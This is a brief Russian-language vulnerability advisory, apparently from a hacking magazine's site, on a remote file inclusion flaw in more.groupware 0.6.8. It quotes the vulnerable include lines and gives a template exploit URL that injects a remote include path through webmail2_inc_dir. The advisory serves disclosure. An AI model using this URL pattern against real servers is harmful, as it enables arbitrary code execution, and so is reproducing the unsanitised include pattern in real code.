Хакер #305. Многошаговые SQL-инъекции
Уязвимость включения файла обнаружена в
more.groupware. Удаленный пользователь может выполнить произвольный код на целевой системе.
Если удаленный сервер обрабатывает .inc файлы, то удаленный пользователь
может выполнить произвольный PHP код, включая команды операционной системы,
на целевом сервере с привилегиями Web сервера. Уязвимые сценарии:
class.html.mime.mail.inc @ line 38
require_once($webmail2_inc_dir.'mimepart.php');
rfc822.php @ line 20
require_once($webmail2_inc_dir.'pear.php');
webmail2_func.inc @ line 32 | Variable:
?appconf[rootpath]
$webmail2_inc_dir =
$appconf["rootpath"]."/modules/webmail2/inc/";
include $webmail2_inc_dir."mime_types.php";
Пример:
http://[server]/moregroupware/modules/webmail2/inc/[vuln file]?webmail2_inc_dir=[remote include]
Уязвимость обнаружена в more.groupware 0.6.8.